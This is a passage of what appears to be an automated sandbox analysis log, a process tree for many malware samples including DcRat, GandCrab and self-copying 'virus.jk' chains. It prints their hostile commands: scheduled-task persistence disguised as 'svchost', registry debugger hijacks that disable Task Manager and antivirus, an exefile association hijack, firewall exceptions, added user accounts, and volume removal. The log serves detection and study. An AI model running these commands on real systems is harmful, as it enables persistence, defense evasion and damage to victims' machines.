      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
      4⤵
      DcRat
      PID:6828
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:6548
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      DcRat
      Scheduled Task/Job: Scheduled Task
      PID:3384
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:6280
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      DcRat
      Scheduled Task/Job: Scheduled Task
      PID:6960
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:720
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      PID:2680
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:6796
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      PID:5512
- C:\Program Files (x86)\Darkest Dungeon setub.exe
  "C:\Program Files (x86)\Darkest Dungeon setub.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3400
- - C:\Program Files (x86)\virus.jk.jk.exe
    "C:\Program Files (x86)\virus.jk.jk.exe" C:\Users\Admin\AppData\Roaming\svhost.exe
    3⤵
    PID:6164
  - - C:\Program Files (x86)\virus.jk.jk.jk.exe
      "C:\Program Files (x86)\virus.jk.jk.jk.exe"
      4⤵
      PID:6332
    - - C:\NH-Helper.exe
        
        C:\NH-Helper.exe
        5⤵
        
        PID:5616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\123.bat
        6⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        7⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        7⤵
        
        PID:6520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        7⤵
        
        PID:6476
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe
        6⤵
        
        PID:5984
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ftype exefile=C:\Program Files (x86)\virus.jk.jk.jk.exe %1
        5⤵
        
        PID:6384
    - - C:\J-V-C.EXE
        
        C:\J-V-C.EXE
        5⤵
        
        PID:6688
- C:\Program Files (x86)\evil.exe
  "C:\Program Files (x86)\evil.exe"
  2⤵
  - Executes dropped EXE
  PID:4748
- - C:\Users\Admin\AppData\Local\Temp\evil.exe
    "C:\Users\Admin\AppData\Local\Temp\evil.exe"
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:6372
- C:\Program Files (x86)\fwclt.exe
  "C:\Program Files (x86)\fwclt.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3224
- C:\Program Files (x86)\Gandcrab5.0.3.exe
  "C:\Program Files (x86)\Gandcrab5.0.3.exe"
  2⤵
  - Executes dropped EXE
  PID:1712
- - C:\Windows\SysWOW64\wermgr.exe
    "C:\Windows\System32\wermgr.exe"
    3⤵
    PID:5688
  - - C:\Program Files (x86)\virus.jk.jk.jk.exe
      "C:\Program Files (x86)\virus.jk.jk.jk.exe" C:\Windows\system32\wbem\wmic.exe
      4⤵
      PID:5836
    - - C:\Program Files (x86)\virus.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.exe"
        5⤵
        
        PID:5716
      - C:\NH-Helper.exe
        
        C:\NH-Helper.exe
        6⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\123.bat
        7⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        8⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        8⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        8⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe
        7⤵
        
        PID:6528
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ftype exefile=C:\Program Files (x86)\virus.jk.jk.jk.jk.exe %1
        6⤵
        
        PID:3088
- C:\Program Files (x86)\Happy18.exe
  "C:\Program Files (x86)\Happy18.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:3096
- C:\Program Files (x86)\kosomk.exe
  "C:\Program Files (x86)\kosomk.exe"
  2⤵
  PID:1956
- - C:\Users\Admin\AppData\Roaming\dicsord.exe
    "C:\Users\Admin\AppData\Roaming\dicsord.exe"
    3⤵
    PID:5404
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\dicsord.exe" "dicsord.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:6164
- C:\Program Files (x86)\LightNeuronX0.exe
  "C:\Program Files (x86)\LightNeuronX0.exe"
  2⤵
  PID:2312
- C:\Program Files (x86)\malecus.exe
  "C:\Program Files (x86)\malecus.exe"
  2⤵
  PID:456
- C:\Program Files (x86)\see7.exe
  "C:\Program Files (x86)\see7.exe"
  2⤵
  PID:2352
- - C:\Program Files (x86)\see7.exe
    "C:\Program Files (x86)\see7.exe"
    3⤵
    PID:7036
- - C:\Program Files (x86)\see7.exe
    "C:\Program Files (x86)\see7.exe"
    3⤵
    PID:5288
- - C:\Program Files (x86)\see7.exe
    "C:\Program Files (x86)\see7.exe"
    3⤵
    PID:7912
- C:\Program Files (x86)\TEST.exe
  "C:\Program Files (x86)\TEST.exe"
  2⤵
  PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB977.tmp.bat""
    3⤵
    PID:4500
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4948
  - - C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
      "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
      4⤵
      PID:772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\touhou virus.bat" "
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\net.exe
    net user Shanghai /add
    3⤵
    PID:6524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Shanghai /add
      4⤵
      PID:6060
- - C:\Windows\SysWOW64\net.exe
    net user Bad Apple /add
    3⤵
    PID:3400
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Bad Apple /add
      4⤵
      PID:5400
- - C:\Windows\SysWOW64\net.exe
    net user Marisa
    3⤵
    PID:6264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Marisa
      4⤵
      PID:7108
- - C:\Windows\SysWOW64\net.exe
    net user Reimu /add
    3⤵
    PID:1952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Reimu /add
      4⤵
      PID:6784
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol X:\ /d
    3⤵
    PID:2664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=PTt19B5_V3I
    3⤵
    PID:7264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=tpedaZ0_yyQ
    3⤵
    PID:7808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:7528
- - C:\Windows\SysWOW64\diskpart.exe
    diskpart
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\explorer.exe
    explorer
    3⤵
    PID:5256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=ZaFd5xdunKI
    3⤵
    PID:6476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:6384
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe
    3⤵
    PID:480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=YB0NwvJY39o
    3⤵
    PID:6604
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:1048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,4651934669320407924,10776498199354472465,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
      4⤵
      PID:7984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,4651934669320407924,10776498199354472465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
      4⤵
      PID:7988
- - C:\Windows\SysWOW64\explorer.exe
    explorer
    3⤵
    PID:7088
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=R8-geAYZtX0
    3⤵
    PID:7684
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:6472
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,714497048247098584,5603358300253739253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 /prefetch:3
      4⤵
      PID:6260
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=EQqgmlXLhF4
    3⤵
    PID:1988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:6368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,5903006000844252060,6858603846990503632,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:3
      4⤵
      PID:7172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=PTt19B5_V3I
    3⤵
    PID:7740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:6552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,4253271346300519215,17670717941038218619,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 /prefetch:3
      4⤵
      PID:6776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=tpedaZ0_yyQ
    3⤵
    PID:5828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
      4⤵
      PID:5756
- - C:\Windows\SysWOW64\diskpart.exe
    diskpart
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\explorer.exe
    explorer
    3⤵
    PID:2504
- C:\Program Files (x86)\vbc.exe
  "C:\Program Files (x86)\vbc.exe"
  2⤵
  PID:3224
- - C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
    C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
    3⤵
    PID:4048
  - - C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
      C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
      4⤵
      PID:2584
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 604
      4⤵
      Program crash
      PID:2924
- C:\Program Files (x86)\virus.jk.exe
  "C:\Program Files (x86)\virus.jk.exe"
  2⤵
  PID:4888
- - C:\Program Files (x86)\virus.jk.jk.exe
    "C:\Program Files (x86)\virus.jk.jk.exe"
    3⤵
    PID:3468
  - - C:\NH-Helper.exe
      C:\NH-Helper.exe
      4⤵
      PID:5472
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\123.bat
        5⤵
        
        PID:5752
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        6⤵
        
        PID:6116
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        6⤵
        
        PID:2680
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
        6⤵
        
        PID:6532
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe
        5⤵
        
        PID:5760
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ftype exefile=C:\Program Files (x86)\virus.jk.jk.exe %1
      4⤵
      PID:6028
  - - C:\J-V-C.EXE
      C:\J-V-C.EXE
      4⤵
      PID:1752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\sihost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1780

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
PID:788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:5244
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
    3⤵
    PID:5276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
    3⤵
    PID:3224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
    3⤵
    PID:5632
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
    3⤵
    PID:6376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
    3⤵
    PID:6864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
    3⤵
    PID:6920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
    3⤵
    PID:6812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
    3⤵
    PID:7068
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
    3⤵
    PID:4720
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
    3⤵
    PID:7920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
    3⤵
    PID:8020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
    3⤵
